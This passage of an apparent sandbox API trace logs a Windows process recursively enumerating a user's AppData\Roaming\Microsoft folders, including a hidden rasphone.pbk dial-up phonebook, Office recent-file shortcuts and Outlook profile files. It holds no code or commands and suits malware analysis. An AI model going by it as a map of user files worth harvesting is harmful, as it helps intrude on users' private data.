cAlternateFileName="")) returned 0 [0220.235] GetLastError () returned 0x12 [0220.235] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e143190, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0220.235] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f9038, Size=0x96) returned 0x2e6040 [0220.235] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0220.235] GetLastError () returned 0x12 [0220.236] FindNextFileW (in: hFindFile=0x2eb468, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0220.236] GetLastError () returned 0x12 [0220.236] FindNextFileW (in: hFindFile=0x2eb428, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network", cAlternateFileName="")) returned 1 [0220.236] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ec460, Size=0x58) returned 0x2e1620 [0220.236] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4a8, Size=0x68) returned 0x2f7508 [0220.236] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cfc80, Size=0x3c) returned 0x2c7908 [0220.237] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c7908, Size=0x78) returned 0x2c0b20 [0220.237] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Network\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb4a8 [0220.237] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.238] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 1 [0220.238] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4e8, Size=0x68) returned 0x2d60e0 [0220.238] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c78c0, Size=0x80) returned 0x2fa200 [0220.238] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x48) returned 0x2c69a0 [0220.238] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c69a0, Size=0x90) returned 0x2e6040 [0220.238] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb4e8 [0220.239] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.239] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pbk", cAlternateFileName="")) returned 1 [0220.239] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c78c0, Size=0x80) returned 0x2fa200 [0220.241] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c6680, Size=0x88) returned 0x2e6040 [0220.241] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x4c) returned 0x2f8fe0 [0220.241] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f8fe0, Size=0x98) returned 0x2f3978 [0220.241] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb528 [0220.241] FindNextFileW (in: hFindFile=0x2eb528, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.241] FindNextFileW (in: hFindFile=0x2eb528, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_hiddenPbk", cAlternateFileName="_HIDDE~1")) returned 1 [0220.242] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c6680, Size=0x88) returned 0x2e6040 [0220.242] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f9038, Size=0x9e) returned 0x2f3978 [0220.242] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ec460, Size=0x54) returned 0x2e1620 [0220.242] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2e1620, Size=0xa8) returned 0x2f6e58 [0220.242] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb568 [0220.243] FindNextFileW (in: hFindFile=0x2eb568, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.243] FindNextFileW (in: hFindFile=0x2eb568, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rasphone.pbk", cAlternateFileName="")) returned 1 [0220.244] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f9038, Size=0x9e) returned 0x2e6040 [0220.244] FindNextFileW (in: hFindFile=0x2eb568, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0220.244] GetLastError () returned 0x12 [0220.244] FindNextFileW (in: hFindFile=0x2eb528, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0220.244] GetLastError () returned 0x12 [0220.244] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0220.244] GetLastError () returned 0x12 [0220.245] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0220.245] GetLastError () returned 0x12 [0220.245] FindNextFileW (in: hFindFile=0x2eb428, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28666ef0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b32ecd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b32ecd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office", cAlternateFileName="")) returned 1 [0220.245] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ec460, Size=0x58) returned 0x2e1620 [0220.245] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4a8, Size=0x66) returned 0x2d60e0 [0220.245] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cfc80, Size=0x38) returned 0x2eb4a8 [0220.246] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4a8, Size=0x70) returned 0x2e6040 [0220.246] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Office\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28666ef0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b32ecd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b32ecd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb4a8 [0220.246] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28666ef0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b32ecd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b32ecd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.246] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2868d050, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2868d050, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2868d050, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x9362, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSO1033.acl", cAlternateFileName="")) returned 1 [0220.246] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4e8, Size=0x66) returned 0x2d60e0 [0220.247] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2b32ecd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x76f5acc0, ftLastAccessTime.dwHighDateTime=0x1d772da, ftLastWriteTime.dwLowDateTime=0x76f5acc0, ftLastWriteTime.dwHighDateTime=0x1d772da, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0220.247] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4e8, Size=0x66) returned 0x2d60e0 [0220.247] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c78c0, Size=0x74) returned 0x2c0b20 [0220.247] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cfc80, Size=0x40) returned 0x2c78c0 [0220.247] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c78c0, Size=0x80) returned 0x2fa200 [0220.247] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2b32ecd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x76f5acc0, ftLastAccessTime.dwHighDateTime=0x1d772da, ftLastWriteTime.dwLowDateTime=0x76f5acc0, ftLastWriteTime.dwHighDateTime=0x1d772da, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb4e8 [0220.248] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2b32ecd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x76f5acc0, ftLastAccessTime.dwHighDateTime=0x1d772da, ftLastWriteTime.dwLowDateTime=0x76f5acc0, ftLastWriteTime.dwHighDateTime=0x1d772da, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.248] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x76db7da0, ftCreationTime.dwHighDateTime=0x1d772da, ftLastAccessTime.dwLowDateTime=0x76f5acc0, ftLastAccessTime.dwHighDateTime=0x1d772da, ftLastWriteTime.dwLowDateTime=0x76f5acc0, ftLastWriteTime.dwHighDateTime=0x1d772da, nFileSizeHigh=0x0, nFileSizeLow=0x414, dwReserved0=0x0, dwReserved1=0x0, cFileName="0706_1643278086845.LNK", cAlternateFileName="0706_1~1.LNK")) returned 1 [0220.248] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c78c0, Size=0x74) returned 0x2c0b20 [0220.248] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x2b413510, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b413510, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x76f80e20, ftLastWriteTime.dwHighDateTime=0x1d772da, nFileSizeHigh=0x0, nFileSizeLow=0x57, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0220.248] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c78c0, Size=0x74) returned 0x2c0b20 [0220.249] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2b3ed3b0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b3ed3b0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b3ed3b0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x451, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates.LNK", cAlternateFileName="TEMPLA~1.LNK")) returned 1 [0220.249] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c78c0, Size=0x74) returned 0x2c0b20 [0220.249] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0220.249] GetLastError () returned 0x12 [0220.249] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0220.249] GetLastError () returned 0x12 [0220.249] FindNextFileW (in: hFindFile=0x2eb428, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x500531d0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x5b267fb0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x5b267fb0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook", cAlternateFileName="")) returned 1 [0220.250] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ec460, Size=0x58) returned 0x2e1620 [0220.250] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4a8, Size=0x68) returned 0x2d60e0 [0220.250] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cfc80, Size=0x3c) returned 0x2c7908 [0220.250] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c7908, Size=0x78) returned 0x2c0b20 [0220.250] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Outlook\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x500531d0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x5b267fb0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x5b267fb0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb4a8 [0220.251] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x500531d0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x5b267fb0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x5b267fb0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.251] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x53aa4cd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x53aa4cd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3a502870, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook.srs", cAlternateFileName="")) returned 1 [0220.251] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4e8, Size=0x68) returned 0x2d60e0 [0220.252] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5b267fb0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x5b267fb0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3a907d30, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x93e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook.xml", cAlternateFileName="")) returned 1 [0220.252] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4e8, Size=0x68) returned 0x2d60e0 [0220.252] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0220.252] GetLastError () returned 0x12 [0220.252] FindNextFileW (in: hFindFile=0x2eb428, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8bfe1300, ftCreationTime.dwHighDateTime=0x1d772da, ftLastAccessTime.dwLowDateTime=0x8bfe1300, ftLastAccessTime.dwHighDateTime=0x1d772da, ftLastWriteTime.dwLowDateTime=0x8bfe1300, ftLastWriteTime.dwHighDateTime=0x1d772da, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof", cAlternateFileName="")) returned 1 [0220.252] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ec460, Size=0x58) returned 